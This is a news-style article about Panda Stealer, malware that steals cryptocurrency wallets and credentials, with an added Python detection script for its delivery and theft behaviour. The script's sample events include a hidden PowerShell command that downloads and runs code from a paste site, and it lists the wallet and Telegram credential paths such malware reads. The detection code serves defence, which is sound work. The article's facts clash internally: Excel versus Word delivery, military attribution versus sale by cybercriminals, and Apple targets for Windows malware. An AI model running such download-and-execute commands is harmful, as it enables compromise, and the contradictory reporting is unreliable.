Credential-stealing malware that targets digital currency wallets has been discovered spreading through malicious spam emails and Discord channels. Panda Stealer, reportedly named after the group alleged to have created it, appeared in late February and steals login credentials from victims' web browsers. It also decrypts wallet files stored on the victim's computer to steal cryptocurrencies such as bitcoin, ethereum and litecoin.
Panda Stealer is one of the first pieces of malware believed to be tied to Chinese military hackers. Its most recent targets have been companies that primarily build software for iPhone and Mac computers, suggesting that the stealer might itself be used in future attacks on iPhones and Macs. The malware has mostly hit victims in the U.S., Germany, Japan and Australia.
Trend Micro was the first security company to publicly document the malware. In a recent blog post, the Tokyo-based firm said Panda Stealer is delivered through spam emails posing as business quotes, luring unsuspecting victims into opening malicious Excel files.
The malware has two infection chains, the security company said. In one of them, Panda Stealer arrives as a .DOC file attachment that, when opened, exploits a recent Microsoft Word vulnerability to drop several files into the user's profile folder. One of those files is an executable containing most of the malicious functionality, and it is set to run every time Word starts. Most of the dropped commands do not look malicious on their own; they appear intended to keep the infection in memory and out of sight of traditional file-based analysis. The one that stands out reaches out to paste.ee, a Pastebin-style service, and retrieves yet another PowerShell command from it.
"Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim's various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum," Trend Micro said. The malware does not interact with the wallet software or the blockchain itself; it reads the wallet data stored locally on the victim's machine. It also steals credentials from other applications, such as Steam, Telegram and similar programs.
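The two behaviours described in the last two paragraphs, an Office application launching PowerShell that pulls a second stage from a paste site, and an unrelated process reading locally stored wallet and messenger credential files, are both observable in endpoint telemetry. The following is an added detection example written for this page; it is not Trend Micro's tooling or any code from the malware. The key=value event format, the process names, the sample events and the wallet directory list are all constructed assumptions for illustration, to be mapped onto your own EDR's process-creation and file-access events.

```python
"""Detection logic for the delivery and theft behaviour described above.

Added example, not the page's or Trend Micro's code. The log format, the
sample events, the process names and the wallet paths are assumptions.
"""
import re
from dataclasses import dataclass

# Constructed sample telemetry (assumption: one key=value event per line,
# values with spaces are double-quoted).
SAMPLE_EVENTS = """\
type=process parent=EXCEL.EXE image=powershell.exe cmd="powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://paste.ee/r/abc123')"
type=process parent=explorer.exe image=powershell.exe cmd="powershell -File C:\\Scripts\\backup.ps1"
type=process parent=WINWORD.EXE image=powershell.exe cmd="powershell -enc SQBFAFgA"
type=file image=svc.exe path="C:\\Users\\bob\\AppData\\Roaming\\Litecoin\\wallet.dat"
type=file image=litecoin-qt.exe path="C:\\Users\\bob\\AppData\\Roaming\\Litecoin\\wallet.dat"
type=file image=svc.exe path="C:\\Users\\bob\\AppData\\Roaming\\Telegram Desktop\\tdata\\key_datas"
type=file image=notepad.exe path="C:\\Users\\bob\\Documents\\notes.txt"
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
PASTE_HOSTS = ("paste.ee", "pastebin.com")

# Directories a wallet/credential stealer reads, mapped to the processes that
# legitimately touch them (assumed names; tune to the software you deploy).
SENSITIVE_DIRS = {
    "\\litecoin\\": {"litecoin-qt.exe", "litecoind.exe"},
    "\\dashcore\\": {"dash-qt.exe", "dashd.exe"},
    "\\ethereum\\": {"geth.exe"},
    "\\bytecoin\\": {"bytecoin-gui.exe"},
    "\\telegram desktop\\tdata\\": {"telegram.exe"},
    "\\steam\\config\\": {"steam.exe"},
}

EVENT_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


@dataclass
class Finding:
    rule: str
    image: str
    detail: str


def parse_event(line: str) -> dict:
    """Turn one key=value line into a dict; quoted values may contain spaces."""
    event = {}
    for m in EVENT_RE.finditer(line):
        key, raw, quoted = m.group(1, 2, 3)
        event[key] = quoted if quoted is not None else raw
    return event


def check_office_spawn(ev: dict):
    """Office app -> powershell.exe is the macro/exploit delivery pattern."""
    if ev.get("type") != "process":
        return None
    if ev.get("parent", "").lower() not in OFFICE_APPS:
        return None
    if ev.get("image", "").lower() != "powershell.exe":
        return None
    cmd = ev.get("cmd", "")
    detail = f"{ev['parent']} launched PowerShell"
    if any(host in cmd.lower() for host in PASTE_HOSTS):
        detail += "; fetches second stage from a paste site"
    elif re.search(r"-e(nc(odedcommand)?)?\b", cmd, re.I):
        detail += "; encoded command"
    return Finding("office_spawned_powershell", ev.get("image", "?"), detail)


def check_wallet_access(ev: dict):
    """Anything but the owning application reading wallet/credential files."""
    if ev.get("type") != "file":
        return None
    path = ev.get("path", "")
    image = ev.get("image", "?")
    for marker, allowed in SENSITIVE_DIRS.items():
        if marker in path.lower() and image.lower() not in allowed:
            return Finding("wallet_or_credential_file_access", image,
                           f"{image} read {path}")
    return None


def analyze(log_text: str) -> list:
    """Run every rule over every event line and collect the findings."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        for rule in (check_office_spawn, check_wallet_access):
            finding = rule(ev)
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.image}: {f.detail}")
```

The two rules are deliberately narrow: the first fires only on an Office parent, so ordinary administrative PowerShell (the explorer.exe line) stays quiet, and the second suppresses the wallet's own client so that only a foreign process such as the dropped executable reading wallet.dat or Telegram's tdata directory is reported.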
Researchers tied Panda Stealer's infrastructure to the VPS provider Shock Hosting. The hosting company said the server linked to that address has since been suspended.
Trend Micro found that the malware was built by "the same people who developed and sold Collector Stealer." The researchers wrote, "Cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C2 panel. Threat actors may also augment their malware campaigns with specific features from Collector Stealer."